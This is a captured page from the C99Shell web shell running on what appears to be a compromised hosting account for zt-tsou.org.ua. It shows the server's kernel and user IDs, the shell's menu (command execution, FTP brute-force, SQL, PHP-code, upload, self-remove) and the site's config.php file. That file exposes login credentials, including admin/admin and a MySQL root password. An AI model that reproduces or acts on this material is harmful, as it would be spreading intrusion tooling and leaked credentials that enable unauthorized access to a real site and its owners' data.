!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/zt-tsou.org.ua/modules/upload/   drwxr-xr-x
Free 107.41 GB of 200.55 GB (53.56%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (1.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

$multi_user 
false;
        
# if 'false' single user settings will be used.
        # else if 'true' ONLY multiple user settings will be used!!

#---single user settings-----#

$user "admin";        # Login username
$passwd "admin";    # Login password

$homedir $_SERVER['DOCUMENT_ROOT']."/data/files/".$_SESSION['admin_homedir'];    # Default directory for single user. Use absolute path.
$enable_login true;    # Caution!! 'false' means everyone have access to your files!
$rdonly false;        # Read-only access to the single user.

#---multiple user settings-------#

$mysql_server="localhost";        
$mysql_user "root";
$mysql_passwd "password";
$mysql_db "navphp";    // database name
$mysql_table "navphp_users";    // table name

#---Other Options---------

$cols "auto";    
        
# Number of icon columns. Leave as auto for autodetection.
        # 5 best suited for 800x600 and 7 for 1024x768

$thumb false;    
        
# Force thumbnail view for all supported images.
        # (This has no relation with the thumbnail in the left pane)

$max_edit_size 200000
        
# maximum file size that can be edited (in Bytes).

$uploads 6;
        
# No. of files that can be uploaded at a time

$mode "ajax";
        
# Can take three values 'auto', 'ajax' and 'normal'
        # If you don't know about this, select 'auto'.
        # 'auto' - Your browser compatibility will be automatically detected. (Recommended)
        
$compress true;
        
# Compress page using gzip deflate encoding. Recommended.

$EditableFiles "php php4 php3 phtml phps conf cf sh shar csh ksh tcl cgi pl js vbs txt inc html htm shtml css xml xsl ini inf cfg log nfo bat tex sql java c cpp cs";
        
# Editable Files (code editor)

$HTMLfiles "htm html phtml shtml";
        
# Enabled file types for WYSIWYG HTML editor.
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0125 ]--